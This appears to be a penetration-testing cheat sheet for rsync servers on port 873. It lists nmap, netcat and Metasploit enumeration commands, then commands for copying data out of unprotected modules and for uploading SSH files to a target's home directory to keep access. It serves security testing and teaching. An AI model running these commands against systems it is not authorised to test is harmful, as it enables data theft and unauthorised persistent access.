Default Port: 873
To initiate a connection with an rsync server, use the rsync
command followed by the rsync URL.
The URL format is `[rsync://][user@]host[:port]/module.``
rsync rsync://user@target_host/
Identifying an Rsync Server
You can use Nmap
to check if there's an Rsync server on a target host like this:
nmap -p 873 X.X.X.X
Banner Grabbing
You can use Netcat
to find out what service is running and its version by looking at the welcome message it shows when you connect. This method is called Banner Grabbing.
nc -nv X.X.X.X 873
# Expected output format
@RSYNCD: version
Enumerate Modules
Enumeration is crucial in understanding the structure of the target rsync module and finding misconfigurations or sensitive information.
Using nmap
nmap -sV --script "rsync-list-modules" -p 873 target_host
Using Metasploit
msf> use auxiliary/scanner/rsync/modules_list
Enumerate Shared Folders
Rsync modules represent directory shares and may be protected with a password. To list these modules:
rsync target_host::
For detailed enumeration of a specific module to see files and permissions:
rsync -av --list-only rsync://target_host/module_name
Attack Vectors
Misconfigured Modules
Modules without proper authentication can be accessed by unauthorized users. This vulnerability allows attackers to read, modify, or delete sensitive data.
If a module is writable, and you have determined its path through enumeration, you can upload malicious files, potentially leading to remote command execution or pivoting into the network.
Outdated Rsync Version
Old versions of rsync may contain vulnerabilities that can be exploited. Use tools like nmap with version detection to identify if the target is running an outdated rsync version.
nmap -sV --script=rsync-list-modules target_host
Data Exfiltration
Sensitive data identified during enumeration can be exfiltrated using rsync:
rsync -avz target_host::module_name /local/directory/
Gain Persistent Access
Upload artifacts like modified scripts or binaries to maintain access:
rsync -av home_user/.ssh/ rsync://user@target_host/home_user/.ssh